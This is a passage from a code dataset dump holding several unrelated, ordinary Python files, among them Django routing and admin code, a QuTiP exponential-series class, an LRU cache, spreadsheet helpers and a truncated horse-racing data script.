views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\n\nfrom . import views\n\napp_name = 'products'\nurlpatterns = [\n path('', views.home, name = 'home'),\n path('contact/', views.contact, name = 'contact'),\n path('product//', views.product_view, name= 'product_view'),\n path('product//comment/save/', views.comment_save, name= 'comment_save'),\n path('product//review/save/', views.review_save, name= 'review_save'),\n path('product/category/', views.category, name= 'category'),\n path('product/checkout/', views.checkout, name= 'checkout'),\n path('product/cart/', views.cart, name= 'cart'),\n path('product/confirmation/', views.confirmation, name= 'confirmation'),\n]\n","sub_path":"src/ecommerce/products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"571767801","text":"# -*- coding=UTF-8 -*-\n\"\"\"Use cgtw web api. \"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport mimetypes\nimport os\nimport cast_unknown as cast\n\nfrom ..model import ImageInfo\nfrom .http import post\nimport datetime\nfrom .. import compat\n\nTYPE_CHECKING = False\nif TYPE_CHECKING:\n from typing import Text\n\n\nclass ChinaTimezone(datetime.tzinfo):\n \"\"\"Timezone of china.\"\"\"\n\n def tzname(self, dt):\n return \"UTC+8\"\n\n def utcoffset(self, dt):\n return datetime.timedelta(hours=8)\n\n def dst(self, dt):\n return datetime.timedelta()\n\n\ndef _upload_image_v5_2(filename, folder, token):\n # type: (Text, Text, Text) -> ImageInfo\n \"\"\"Upload image to server.\n\n Args:\n filename (str): Filename.\n folder (str): Server upload folder, usually same with project name.\n token (str): Server session token.\n\n Returns:\n ImageInfo: Uploaded image information.\n \"\"\"\n\n filename = cast.text(filename)\n basename = os.path.basename(filename)\n data = post(\n \"web_upload_file\",\n {\n \"folder\": folder,\n \"type\": \"project\",\n \"method\": \"convert_image\",\n \"filename\": basename,\n },\n token=token,\n files={\n \"file\": (basename, open(filename, \"rb\"), mimetypes.guess_type(basename)[0])\n },\n )\n assert isinstance(data, dict), type(data)\n return ImageInfo(data[\"max\"], data[\"min\"], filename)\n\n\ndef _upload_image_v6_1(filename, folder, token):\n # type: (Text, Text, Text) -> ImageInfo\n \"\"\"Upload image to server.\n\n Args:\n filename (str): Filename.\n folder (str): Server upload folder, usually same with project name.\n token (str): Server session token.\n\n Returns:\n ImageInfo: Uploaded image information.\n \"\"\"\n\n filename = cast.text(filename)\n basename = os.path.basename(filename)\n mtime = os.path.getmtime(filename)\n data = post(\n \"web_upload_file\",\n {\n \"method\": \"attachment_upload\",\n \"is_web\": \"Y\",\n \"db\": folder,\n \"format\": \"image\",\n \"filename\": basename,\n \"attachment_argv\": {\n \"type\": \"main\",\n \"filename\": filename,\n \"modify_time\": datetime.datetime.fromtimestamp(\n mtime, ChinaTimezone()\n ).strftime(\"%Y-%m-%d %H:%M:%S\"),\n },\n },\n token=token,\n files={\n \"file\": (basename, open(filename, \"rb\"), mimetypes.guess_type(basename)[0])\n },\n )\n assert isinstance(data, dict), type(data)\n return ImageInfo(data[\"max\"], data[\"min\"], filename, data[\"att_id\"])\n\n\ndef upload_image(filename, folder, token):\n # type: (Text, Text, Text) -> ImageInfo\n\n if compat.api_level() == compat.API_LEVEL_5_2:\n return _upload_image_v5_2(filename, folder, token)\n return _upload_image_v6_1(filename, folder, token)\n","sub_path":"cgtwq/server/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"314772837","text":"# This file is part of QuTiP: Quantum Toolbox in Python.\n#\n# Copyright (c) 2011 and later, Paul D. Nation and Robert J. Johansson.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are\n# met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# 3. Neither the name of the QuTiP: Quantum Toolbox in Python nor the names\n# of its contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A\n# PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n###############################################################################\n\n__all__ = ['eseries', 'esval', 'esspec', 'estidy']\n\nimport numpy as np\nimport scipy.sparse as sp\nfrom qutip.qobj import Qobj\n\n\nclass eseries():\n \"\"\"\n Class representation of an exponential-series expansion of\n time-dependent quantum objects.\n\n Attributes\n ----------\n ampl : ndarray\n Array of amplitudes for exponential series.\n rates : ndarray\n Array of rates for exponential series.\n dims : list\n Dimensions of exponential series components\n shape : list\n Shape corresponding to exponential series components\n\n Methods\n -------\n value(tlist)\n Evaluate an exponential series at the times listed in tlist\n spec(wlist)\n Evaluate the spectrum of an exponential series at frequencies in wlist.\n tidyup()\n Returns a tidier version of the exponential series\n\n \"\"\"\n __array_priority__ = 101\n\n def __init__(self, q=np.array([], dtype=object), s=np.array([])):\n\n if isinstance(s, (int, float, complex)):\n s = np.array([s])\n\n if (not np.any(np.asarray(q, dtype=object))) and (len(s) == 0):\n self.ampl = np.array([])\n self.rates = np.array([])\n self.dims = [[1, 1]]\n self.shape = [1, 1]\n\n elif np.any(np.asarray(q, dtype=object)) and (len(s) == 0):\n if isinstance(q, eseries):\n self.ampl = q.ampl\n self.rates = q.rates\n self.dims = q.dims\n self.shape = q.shape\n elif isinstance(q, (np.ndarray, list)):\n ind = np.shape(q)\n num = ind[0] # number of elements in q\n sh = np.array([Qobj(x).shape for x in q])\n if any(sh != sh[0]):\n raise TypeError('All amplitudes must have same dimension.')\n self.ampl = np.array([x for x in q])\n self.rates = np.zeros(ind)\n self.dims = self.ampl[0].dims\n self.shape = self.ampl[0].shape\n elif isinstance(q, Qobj):\n qo = Qobj(q)\n self.ampl = np.array([qo])\n self.rates = np.array([0])\n self.dims = qo.dims\n self.shape = qo.shape\n else:\n self.ampl = np.array([q])\n self.rates = np.array([0])\n self.dims = [[1, 1]]\n self.shape = [1, 1]\n\n elif np.any(np.asarray(q, dtype=object)) and len(s) != 0:\n if isinstance(q, (np.ndarray, list)):\n q = np.asarray(q, dtype=object)\n ind = np.shape(q)\n num = ind[0]\n sh = np.array([Qobj(q[x]).shape for x in range(0, num)])\n if np.any(sh != sh[0]):\n raise TypeError('All amplitudes must have same dimension.')\n self.ampl = np.array([Qobj(q[x]) for x in range(0, num)],\n dtype=object)\n self.dims = self.ampl[0].dims\n self.shape = self.ampl[0].shape\n else:\n num = 1\n self.ampl = np.array([Qobj(q)], dtype=object)\n self.dims = self.ampl[0].dims\n self.shape = self.ampl[0].shape\n if isinstance(s, (int, complex, float)):\n if num != 1:\n raise TypeError('Number of rates must match number ' +\n 'of members in object array.')\n self.rates = np.array([s])\n elif isinstance(s, (np.ndarray, list)):\n if len(s) != num:\n raise TypeError('Number of rates must match number ' +\n ' of members in object array.')\n self.rates = np.array(s)\n\n if len(self.ampl) != 0:\n # combine arrays so that they can be sorted together\n zipped = list(zip(self.rates, self.ampl))\n zipped.sort() # sort rates from lowest to highest\n rates, ampl = list(zip(*zipped)) # get back rates and ampl\n self.ampl = np.array(ampl, dtype=object)\n self.rates = np.array(rates)\n\n def __str__(self): # string of ESERIES information\n self.tidyup()\n s = \"ESERIES object: \" + str(len(self.ampl)) + \" terms\\n\"\n s += \"Hilbert space dimensions: \" + str(self.dims) + \"\\n\"\n for k in range(0, len(self.ampl)):\n s += \"Exponent #\" + str(k) + \" = \" + str(self.rates[k]) + \"\\n\"\n if isinstance(self.ampl[k], sp.spmatrix):\n s += str(self.ampl[k]) + \"\\n\"\n else:\n s += str(self.ampl[k]) + \"\\n\"\n return s\n\n def __repr__(self):\n return self.__str__()\n\n # Addition with ESERIES on left (ex. ESERIES+5)\n def __add__(self, other):\n right = eseries(other)\n if self.dims != right.dims:\n raise TypeError(\"Incompatible operands for ESERIES addition\")\n out = eseries()\n out.dims = self.dims\n out.shape = self.shape\n out.ampl = np.append(self.ampl, right.ampl)\n out.rates = np.append(self.rates, right.rates)\n return out\n\n # Addition with ESERIES on right(ex. 5+ESERIES)\n def __radd__(self, other):\n return self + other\n\n # define negation of ESERIES\n def __neg__(self):\n out = eseries()\n out.dims = self.dims\n out.shape = self.shape\n out.ampl = -self.ampl\n out.rates = self.rates\n return out\n\n # Subtraction with ESERIES on left (ex. ESERIES-5)\n def __sub__(self, other):\n return self + (-other)\n\n # Subtraction with ESERIES on right (ex. 5-ESERIES)\n def __rsub__(self, other):\n return other + (-self)\n\n # Multiplication with ESERIES on left (ex. ESERIES*other)\n def __mul__(self, other):\n\n if isinstance(other, eseries):\n out = eseries()\n out.dims = self.dims\n out.shape = self.shape\n\n for i in range(len(self.rates)):\n for j in range(len(other.rates)):\n out += eseries(self.ampl[i] * other.ampl[j],\n self.rates[i] + other.rates[j])\n\n return out\n else:\n out = eseries()\n out.dims = self.dims\n out.shape = self.shape\n out.ampl = self.ampl * other\n out.rates = self.rates\n return out\n\n # Multiplication with ESERIES on right (ex. other*ESERIES)\n def __rmul__(self, other):\n out = eseries()\n out.dims = self.dims\n out.shape = self.shape\n out.ampl = other * self.ampl\n out.rates = self.rates\n return out\n\n #\n # todo:\n # select_ampl, select_rate: functions to select some terms given the ampl\n # or rate. This is done with {ampl} or (rate) in qotoolbox. we should use\n # functions with descriptive names for this.\n #\n\n #\n # evaluate the eseries for a list of times\n #\n def value(self, tlist):\n \"\"\"\n Evaluates an exponential series at the times listed in ``tlist``.\n\n Parameters\n ----------\n tlist : ndarray\n Times at which to evaluate exponential series.\n\n Returns\n -------\n val_list : ndarray\n Values of exponential at times in ``tlist``.\n\n \"\"\"\n\n if self.ampl is None or len(self.ampl) == 0:\n # no terms, evalue to zero\n return np.zeros(np.shape(tlist))\n\n if isinstance(tlist, float) or isinstance(tlist, int):\n tlist = [tlist]\n\n if isinstance(self.ampl[0], Qobj):\n # amplitude vector contains quantum objects\n val_list = []\n\n for j in range(len(tlist)):\n exp_factors = np.exp(np.array(self.rates) * tlist[j])\n\n val = 0\n for i in range(len(self.ampl)):\n val += self.ampl[i] * exp_factors[i]\n\n val_list.append(val)\n\n val_list = np.array(val_list, dtype=object)\n else:\n # the amplitude vector contains c numbers\n val_list = np.zeros(np.size(tlist), dtype=complex)\n\n for j in range(len(tlist)):\n exp_factors = np.exp(np.array(self.rates) * tlist[j])\n val_list[j] = np.sum(np.dot(self.ampl, exp_factors))\n\n if all(np.imag(val_list) == 0):\n val_list = np.real(val_list)\n if len(tlist) == 1:\n return val_list[0]\n else:\n return val_list\n\n def spec(self, wlist):\n \"\"\"\n Evaluate the spectrum of an exponential series at frequencies\n in ``wlist``.\n\n Parameters\n ----------\n wlist : array_like\n Array/list of frequenies.\n\n Returns\n -------\n val_list : ndarray\n Values of exponential series at frequencies in ``wlist``.\n\n \"\"\"\n val_list = np.zeros(np.size(wlist))\n\n for i in range(len(wlist)):\n val_list[i] = 2 * np.real(\n np.dot(self.ampl, 1. / (1.0j * wlist[i] - self.rates)))\n\n return val_list\n\n def tidyup(self, *args):\n \"\"\" Returns a tidier version of exponential series.\n \"\"\"\n #\n # combine duplicate entries (same rate)\n #\n rate_tol = 1e-10\n ampl_tol = 1e-10\n\n ampl_dict = {}\n unique_rates = {}\n ur_len = 0\n\n for r_idx in range(len(self.rates)):\n\n # look for a matching rate in the list of unique rates\n idx = -1\n for ur_key in unique_rates.keys():\n if abs(self.rates[r_idx] - unique_rates[ur_key]) < rate_tol:\n idx = ur_key\n break\n\n if idx == -1:\n # no matching rate, add it\n unique_rates[ur_len] = self.rates[r_idx]\n ampl_dict[ur_len] = [self.ampl[r_idx]]\n ur_len = len(unique_rates)\n else:\n # found matching rate, append amplitude to its list\n ampl_dict[idx].append(self.ampl[r_idx])\n\n # create new amplitude and rate list with only unique rates, and\n # nonzero amplitudes\n self.rates = np.array([])\n self.ampl = np.array([])\n for ur_key in unique_rates.keys():\n total_ampl = np.sum(np.asarray(ampl_dict[ur_key], dtype=object))\n\n if (isinstance(total_ampl, float) or\n isinstance(total_ampl, complex)):\n if abs(total_ampl) > ampl_tol:\n self.rates = np.append(self.rates, unique_rates[ur_key])\n self.ampl = np.append(self.ampl, total_ampl)\n else:\n if abs(total_ampl.full()).max() > ampl_tol:\n self.rates = np.append(self.rates, unique_rates[ur_key])\n self.ampl = np.append(self.ampl,\n np.asarray(total_ampl,\n dtype=object))\n\n return self\n\n\n# -----------------------------------------------------------------------------\n#\n# wrapper functions for accessing the class methods (for compatibility with\n# quantum optics toolbox)\n#\ndef esval(es, tlist):\n \"\"\"\n Evaluates an exponential series at the times listed in ``tlist``.\n\n Parameters\n ----------\n tlist : ndarray\n Times at which to evaluate exponential series.\n\n Returns\n -------\n val_list : ndarray\n Values of exponential at times in ``tlist``.\n\n \"\"\"\n return es.value(tlist)\n\n\ndef esspec(es, wlist):\n \"\"\"Evaluate the spectrum of an exponential series at frequencies\n in ``wlist``.\n\n Parameters\n ----------\n wlist : array_like\n Array/list of frequenies.\n\n Returns\n -------\n val_list : ndarray\n Values of exponential series at frequencies in ``wlist``.\n\n \"\"\"\n return es.spec(wlist)\n\n\ndef estidy(es, *args):\n \"\"\"\n Returns a tidier version of exponential series.\n \"\"\"\n return es.tidyup()\n","sub_path":"qutip/eseries.py","file_name":"eseries.py","file_ext":"py","file_size_in_byte":13857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"545147262","text":"# public functions used in project\r\n\r\nfrom openpyxl import load_workbook\r\n\r\n# shift list \"L\" elements to left and repeat last element \"n\" times\r\ndef shift(L, n): # list\r\n ext = [L[-1]] * len(L)\r\n return (L[n:] + ext)[:len(L)]\r\n\r\n\r\n# get number of rows from openpyxl.sheet.calculate_dimension as str\r\ndef get_row_count(coord): # str\r\n i = -1\r\n rc = ''\r\n while True:\r\n if coord[i].isnumeric():\r\n rc = coord[i] + rc\r\n i -= 1\r\n else:\r\n return rc\r\n\r\n\r\n# load droop results from last __trend.xlsx file\r\ndef droop_results(file_name):\r\n wb = load_workbook(file_name, read_only=True, data_only=True)\r\n sh = wb['Droop']\r\n row_count = int(get_row_count(sh.calculate_dimension()))\r\n drp_dic = dict()\r\n for r in range(2, row_count):\r\n drp_dic[sh.cell(r, 1).value] = sh.cell(r, 11).value\r\n\r\n del wb, sh\r\n return drp_dic\r\n\r\n\r\n# class for trend values from \"__trend.xlsm\" and make data for individual excel files\r\nclass IndividualTrends:\r\n def __init__(self, sheet, range):\r\n self.sh = sheet\r\n self.rng = range\r\n\r\n @property\r\n def TimeValues(self):\r\n return [self.sh.cell(1, c).value for c in range(10, 677)]\r\n\r\n @property\r\n def FrqValues(self):\r\n return [self.sh.cell(2, c).value for c in range(10, 677)]\r\n\r\n @property\r\n def PowerValues(self):\r\n pwr_dic = dict()\r\n for row in self.rng[2:]:\r\n pwr_values = []\r\n n = int()\r\n unit = str()\r\n for c, cell in enumerate(row):\r\n if c > 668:\r\n break\r\n if c == 0:\r\n n = cell.value\r\n elif c == 1:\r\n unit = cell.value\r\n else:\r\n pwr_values.append(cell.value)\r\n pwr_values = shift(pwr_values, n)\r\n pwr_dic[unit] = pwr_values\r\n\r\n return pwr_dic\r\n\r\n\r\nclass GenerateExcelChart:\r\n def __init__(self, file_name):\r\n self.fname = file_name\r\n\r\n def __enter__(self):\r\n self.wb = load_workbook('__chart.xlsx')\r\n return self.wb\r\n\r\n def __exit__(self, exc_type, exc_val, exc_tb):\r\n self.wb.save(self.fname)\r\n del self.wb\r\n","sub_path":"project_functions.py","file_name":"project_functions.py","file_ext":"py","file_size_in_byte":2236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"406850986","text":"from django.contrib import admin\nfrom bandsoc.apps.forum.models import Category, ForumItem, PollOption, Post\n\n\nclass PollOptionInline(admin.TabularInline):\n model = PollOption\n\n\nclass PostInline(admin.TabularInline):\n model = Post\n\n\nclass ForumItemAdmin(admin.ModelAdmin):\n inlines = [PollOptionInline, PostInline]\n\n\nadmin.site.register(Category, admin.ModelAdmin)\nadmin.site.register(ForumItem, ForumItemAdmin)\n","sub_path":"bandsoc/apps/forum/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"28005015","text":"\n\nimport os\nimport datetime\nimport subprocess\n\ndef listfile_recursive(path = '.'):\n for root, dirs, fs in os.walk(path):\n for f in fs:\n yield os.path.join(root, f)\n\ndef listfile(path = '.'):\n for f in os.listdir(path):\n if os.isdir(f):\n continue\n yield os.path.join(path, f)\n\ndef run_shell(sh):\n res = subprocess.run([sh], \n stdout = subprocess.PIPE, \n stderr = subprocess.STDOUT, \n shell = True)\n return res.returncode, res.stdout.decode('utf-8') \n\ndef now():\n return str(datetime.datetime.now()).replace(' ', '-').replace(':', '-').replace('.', '')\n","sub_path":"easy/_os.py","file_name":"_os.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"593846121","text":"#!/usr/bin/env python3\nimport os\nimport subprocess\n\n'''\nQ10 from assignments\nShow a menu to the user until and until user select quit and display corresponding os message\n'''\n\nwhile True:\n print('''\n please choose OS from the List:\n 1. macOS\n 2. linux\n 3. windows\n ''')\n choice = input(\"Enter your OS choice here: \").strip().lower()\n subprocess.call('clear', shell=True)\n\n if choice in (\"1\", \"macos\", \"apple\", \"imac\"):\n print(\"hmm.. so you're the richest kid in the town..!!\")\n\n elif choice in (\"2\", \"linux\", \"unix\", \"redhat\", \"ubuntu\"):\n print(\"you must be a GEEK!, what are you coding these days?\")\n\n elif choice in (\"3\", \"windows\", \"microsoft\", \"xp\", \"vista\"):\n print(\"Kids! stop playing video games!!\")\n\n else:\n print(\"the OS type you've entered not available! choose from available options 1-3 or type 'q' to quit\")\n quit_input = input(\":\").strip().lower()\n if quit_input in (\"q\", \"quit\"):\n print(\"Good bye!\")\n break\n else:\n pass\n","sub_path":"10_menu.py","file_name":"10_menu.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"589592136","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 5 16:39:53 2018\n\n@author: TZLMYQ\n\"\"\"\n\nclass Solution:\n def findOrder(self, numCourses, prerequisites):\n \"\"\"\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: List[int]\n \"\"\"\n d = {i:set() for i in range(numCourses)}\n for courses in prerequisites:\n d[courses[1]].add(courses[0])\n visited = [False]*numCourses\n stack = []\n \n def topologicalSort(v, visited, stack):\n visited[v] = True\n for i in d[v]:\n if visited[i] == False:\n topologicalSort(i, visited, stack)\n stack.append(v)\n \n for i in range(numCourses):\n if visited[i] == False:\n topologicalSort(i, visited, stack)\n return stack\n \n \nnumCourses = 4\nprerequisites = [[1,0],[2,0],[3,1],[3,2]]\n \nsolution = Solution()\nprint(solution.findOrder(numCourses, prerequisites))\n \n \n\n","sub_path":"210courses_schedul2.py","file_name":"210courses_schedul2.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"565357085","text":"import sys\n\nfrom datetime import datetime\nfrom threading import RLock\n\nfrom .CacheStorage import CachedItem, ItemNotCached\nfrom .MemoryStorage import MemoryStorage\n\n\nclass ItemExpired(ItemNotCached): pass\n\n\nclass LRUCache:\n '''\n Collection of data where data may be removed to make room\n\n Each peace of data is indexed by a unique key.\n\n Least Recent Used implies that when room is needed in the\n collection, whatever key has been accessed least recently\n is silently removed from the collection.\n\n Actual storage of the data depends on the storage object\n attached, and defaults to in-memory (MemoryStorage)\n '''\n\n def __init__(self, storage=None, max_size=None, sizeof=None, max_age=None):\n '''\n :param storage: Storage for data (CacheStorage)\n :param max_size: Maximum size to store in cache\n :param sizeof: Function to use for calculating the size of data cached\n :param max_age: Max time to hold cached items for (timedelta)\n '''\n self.storage = storage or MemoryStorage()\n self.max_size = max_size\n self.__sizeof = sizeof\n self.max_age = max_age\n self.lock = RLock()\n\n\n def put(self, key, data, expires_in=None, size=None):\n '''\n Add an object to the cache\n\n :param key: Key to use to retrieve this item.\n :param data: The actual item to cache.\n :param expires_in: timedelta to specify when object should expire\n :param size: Size of the entry if known (will skip sizeof calc)\n :return:\n '''\n\n # Determine size of data\n if size is None:\n if self.__sizeof is not None:\n size = self.__sizeof(data)\n else:\n size = sys.getsizeof(key) + sys.getsizeof(data)\n\n # Time to expire\n if expires_in is not None:\n expire_after = datetime.now() + expires_in\n elif self.max_age is not None:\n expire_after = datetime.now() + self.max_age\n else:\n expire_after = None\n\n item = CachedItem(data, size=size, expires=expire_after)\n\n # Manipulate storage\n with self.lock:\n\n # Remove item if already exists\n if self.storage.has_key(key):\n self._remove_item_from_storage(key)\n\n # Sanity check: Data too big for storage\n if self.max_size is not None and size > self.max_size:\n return\n\n # Make sure there is space\n if self.max_size is not None:\n self.make_room_for(size)\n\n # Save item\n self.storage.add(key, item)\n\n\n def get(self, key):\n return self[key]\n\n\n def __getitem__(self, key):\n '''Get data from cache'''\n with self.lock:\n item = self.storage.get(key)\n if item.expires_at is not None and item.expires_at < datetime.now():\n self.remove(key)\n raise ItemExpired()\n self.storage.touch_last_used(key)\n return item.data\n\n\n def __setitem__(self, key, data):\n '''Add item to the cache'''\n self.put(key, data)\n\n\n def keys(self):\n with self.lock:\n return self.storage.keys()\n\n\n def items(self):\n with self.lock:\n for key, item in self.storage.items():\n yield key, item.data\n\n\n def _remove_item_from_storage(self, key):\n '''\n Remove an item from storage\n\n Intended for internal use. No state checking\n '''\n with self.lock:\n self.storage.remove(key)\n\n\n def __delitem__(self, key):\n self._remove_item_from_storage(key)\n\n\n def remove(self, key):\n self._remove_item_from_storage(key)\n\n\n @property\n def num_items(self):\n return self.storage.num_items\n\n\n def close(self):\n with self.lock:\n self.storage.close()\n self.storage = None\n\n\n def clean_expired(self):\n '''Clean old entries out of cache'''\n with self.lock:\n for key, item in self.storage.expired_items():\n self.remove(key)\n\n\n @property\n def total_size_stored(self):\n return self.storage.total_size_stored\n\n\n def make_room_for(self, size):\n '''\n Make room for a new item of the given size\n\n Note: Possible race condition if storage supports multiple LRUCache objects\n in separate processes and called concurrently. Solve this in storage\n engine implementation if needed.\n\n :param size: Size of the new object coming in\n :param max_size: Size limit for the cache storage\n '''\n with self.lock:\n if self.max_size > 0 and size > 0:\n while self.storage.total_size_stored + size > self.max_size:\n self.storage.pop_oldest()\n\n\n","sub_path":"lru/LRUCache.py","file_name":"LRUCache.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"347091483","text":"from typing import List\n\n\nclass Place(object):\n place_id: int\n booked: int\n used: int\n amount_of_pending: int\n amount_of_canceled: int\n amount_of_rejected: int\n amount_of_accepted: int\n amount_of_completed: int\n user_booked: int\n user_used: int\n province_name: str\n deal_title: str\n place_name: str\n business_name: str\n\n def __init__(self,\n place_id: int,\n booked: int,\n used: int,\n amount_of_pending: int,\n amount_of_canceled: int,\n amount_of_rejected: int,\n amount_of_accepted: int,\n amount_of_completed: int,\n user_booked: int,\n user_used: int,\n province_name: str,\n deal_title: str,\n place_name: str,\n business_name: str\n ) \\\n -> None:\n self.place_id = place_id\n self.booked = booked\n self.used = used\n self.amount_of_pending = amount_of_pending\n self.amount_of_canceled = amount_of_canceled\n self.amount_of_rejected = amount_of_rejected\n self.amount_of_accepted = amount_of_accepted\n self.amount_of_completed = amount_of_completed\n self.user_booked = user_booked\n self.user_used = user_used\n self.province_name = province_name\n self.deal_title = deal_title\n self.place_name = place_name\n self.business_name = business_name\n\n\nclass DailyReservationReport(object):\n reservation_id: int\n places: List[Place]\n\n def __init__(self, reservation_id: int, places: List[Place]):\n self.reservation_id = reservation_id\n self.places = places\n","sub_path":"main/model/daily_reservation_report.py","file_name":"daily_reservation_report.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"221731744","text":"from scripts.jra_target_script import Ext, Ld as TargetLd, CreateFile\nfrom modules.jra_jrdb_download import JrdbDownload\nimport my_config as mc\nimport modules.util as mu\nimport pandas as pd\n\nfrom datetime import datetime as dt\nfrom datetime import timedelta\nimport sys\nimport os\n\nclass Ld(TargetLd):\n target_path = mc.TARGET_PATH\n\n def set_odds_df(self, type):\n self.odds_df = self.ext.get_odds_df(type)\n\n def set_target_mark_df(self):\n raceuma_df = self.ext.get_raceuma_before_table_base()[[\"RACE_KEY\", \"UMABAN\"]].copy()\n main_mark_df = self._get_target_mark_df(\"\")\n win_mark_df = self._get_target_mark_df(\"UmaMark2/\")\n jiku_mark_df = self._get_target_mark_df(\"UmaMark3/\")\n tb_us_mark_df = self._get_target_mark_df(\"UmaMark4/\")\n tb_zg_mark_df = self._get_target_mark_df(\"UmaMark5/\")\n nige_mark_df = self._get_target_mark_df(\"UmaMark6/\")\n agari_mark_df = self._get_target_mark_df(\"UmaMark7/\")\n sim_mark_df = self._get_target_mark_df(\"UmaMark8/\")\n raceuma_df = pd.merge(raceuma_df, main_mark_df, on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n raceuma_df = pd.merge(raceuma_df, win_mark_df.rename(columns={\"印\": \"勝\"}), on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n raceuma_df = pd.merge(raceuma_df, jiku_mark_df.rename(columns={\"印\": \"軸\"}), on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n raceuma_df = pd.merge(raceuma_df, tb_us_mark_df.rename(columns={\"印\": \"US\"}), on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n raceuma_df = pd.merge(raceuma_df, tb_zg_mark_df.rename(columns={\"印\": \"ZG\"}), on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n raceuma_df = pd.merge(raceuma_df, nige_mark_df.rename(columns={\"印\": \"逃\"}), on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n raceuma_df = pd.merge(raceuma_df, agari_mark_df.rename(columns={\"印\": \"上\"}), on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n raceuma_df = pd.merge(raceuma_df, sim_mark_df.rename(columns={\"印\": \"類\"}), on=[\"RACE_KEY\", \"UMABAN\"], how=\"left\")\n self.target_mark_df = raceuma_df.copy()\n\n def set_target_race_mark(self):\n self.race_mark_df = self._get_main_race_mark_df()\n\n def _get_main_race_mark_df(self):\n target_file_list = self.race_file_df[\"file_id\"].drop_duplicates().tolist()\n mark_df = pd.DataFrame()\n for file in target_file_list:\n file_df = self.race_file_df.query(f\"file_id == '{file}'\").copy()\n with open(self.target_path + \"UM\" + file + \".DAT\", 'r', encoding=\"ms932\") as f:\n file_dat = f.readlines()\n file_dat = file_dat[:len(file_df.index)]\n file_df.loc[:, \"mark_text\"] = file_dat\n mark_df = pd.concat([mark_df, file_df])\n mark_df.loc[:, \"mark_text\"] = mark_df[\"mark_text\"].apply(lambda x: self.replace_line(x))\n mark_df.loc[:, \"レース印\"] = mark_df[\"mark_text\"].str[0:6]\n race_mark_df = mark_df[[\"RACE_KEY\", \"レース印\"]].copy()\n return race_mark_df\n\n def _get_target_mark_df(self, type):\n target_file_list = self.race_file_df[\"file_id\"].drop_duplicates().tolist()\n mark_df = pd.DataFrame()\n for file in target_file_list:\n print(file)\n file_df = self.race_file_df.query(f\"file_id == '{file}'\").copy()\n with open(self.target_path + type + \"UM\" + file + \".DAT\", 'r', encoding=\"ms932\") as f:\n file_dat = f.readlines()\n file_dat = file_dat[:len(file_df.index)]\n file_df.loc[:, \"mark_text\"] = file_dat\n mark_df = pd.concat([mark_df, file_df])\n mark_df.loc[:, \"mark_text\"] = mark_df[\"mark_text\"].apply(lambda x: self.replace_line(x))\n mark_df.loc[:, \"レース印1\"] = mark_df[\"mark_text\"].str[0:6]\n mark_df.loc[:, \"01\"] = mark_df[\"mark_text\"].str[6:8]\n mark_df.loc[:, \"02\"] = mark_df[\"mark_text\"].str[8:10]\n mark_df.loc[:, \"03\"] = mark_df[\"mark_text\"].str[10:12]\n mark_df.loc[:, \"04\"] = 